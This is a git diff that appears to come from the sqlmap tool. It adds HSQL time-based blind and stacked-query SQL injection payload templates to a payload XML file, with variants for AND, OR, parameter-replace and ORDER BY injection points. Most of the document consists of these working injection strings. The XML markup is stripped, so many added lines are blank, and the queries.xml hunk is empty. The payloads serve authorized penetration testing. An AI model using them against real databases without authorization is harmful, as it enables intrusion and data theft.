diff --git a/xml/payloads.xml b/xml/payloads.xml
index d06d84d93..b8f731681 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1125,8 +1125,6 @@ Formats:
PostgreSQL
-
-
@@ -1878,7 +1876,6 @@ Formats:
-->
-
MySQL inline queries
@@ -1994,8 +1991,8 @@ Formats:
Firebird
-
+
@@ -2245,6 +2242,48 @@ Formats:
>= 2.0
+
+
+ HSQL >= 1.7.2 Server stacked queries
+ 4
+ 1
+ 0
+ 0
+ 1
+ ;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) END
+
+ ;CALL REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000)
+ --
+
+
+
+
+
+ HSQL
+ >= 1.7.2
+
+
+
+
+ HSQL >= 2.0 Server stacked queries
+ 4
+ 1
+ 0
+ 0
+ 1
+ ;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) END
+
+ ;CALL REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)
+ --
+
+
+
+
+
+ HSQL
+ >= 2.0
+
+
@@ -2712,6 +2751,88 @@ Formats:
IBM DB2
+
+
+ HSQL >= 1.7.2 AND time-based blind (heavy query)
+ 5
+ 2
+ 2
+ 1,2,3
+ 1
+ AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END
+
+ AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)
+
+
+
+
+
+ HSQL
+ >= 1.7.2
+
+
+
+
+ HSQL >= 1.7.2 AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END
+
+ AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)
+ --
+
+
+
+
+
+ HSQL
+ >= 1.7.2
+
+
+
+
+ HSQL > 2.0 AND time-based blind (heavy query)
+ 5
+ 2
+ 2
+ 1,2,3
+ 1
+ AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END
+
+ AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)
+
+
+
+
+
+ HSQL
+ > 2.0
+
+
+
+
+ HSQL > 2.0 AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END
+
+ AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)
+ --
+
+
+
+
+
+ HSQL
+ > 2.0
+
+
@@ -2931,6 +3052,88 @@ Formats:
IBM DB2
+
+
+ HSQL >= 1.7.2 OR time-based blind (heavy query)
+ 5
+ 2
+ 2
+ 1,2,3
+ 1
+ OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END
+
+ OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)
+
+
+
+
+
+ HSQL
+ >= 1.7.2
+
+
+
+
+ HSQL >= 1.7.2 OR time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END
+
+ OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)
+ --
+
+
+
+
+
+ HSQL
+ >= 1.7.2
+
+
+
+
+ HSQL > 2.0 OR time-based blind (heavy query)
+ 5
+ 2
+ 2
+ 1,2,3
+ 1
+ OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END
+
+ OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)
+
+
+
+
+
+ HSQL
+ > 2.0
+
+
+
+
+ HSQL > 2.0 OR time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END
+
+ OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)
+ --
+
+
+
+
+
+ HSQL
+ > 2.0
+
+
@@ -3211,7 +3414,7 @@ Formats:
- IBM DB2 AND time-based blind (heavy query)
+ IBM DB2 time-based blind - Parameter replace (heavy query)
5
5
2
@@ -3228,6 +3431,47 @@ Formats:
IBM DB2
+
+
+
+ HSQL >= 1.7.2 time-based blind - Parameter replace (heavy query)
+ 5
+ 2
+ 2
+ 1,2,3
+ 1
+ (SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
+
+
+
+
+
+ HSQL
+ >= 1.7.2
+
+
+
+
+ HSQL > 2.0 time-based blind - Parameter replace (heavy query)
+ 5
+ 2
+ 2
+ 1,2,3
+ 1
+ (SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
+
+
+
+
+
+ HSQL
+ > 2.0
+
+
@@ -3389,11 +3633,52 @@ Formats:
Oracle
+
+
+ HSQL >= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
+ --
+
+
+
+
+
+ HSQL
+ >= 1.7.2
+
+
+
+
+ HSQL > 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))
+
+
+
+
+
+ HSQL
+ > 2.0
+
+
-
+
MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)
3
diff --git a/xml/queries.xml b/xml/queries.xml
index b6a3f6d4d..5039d1b22 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -625,4 +625,74 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+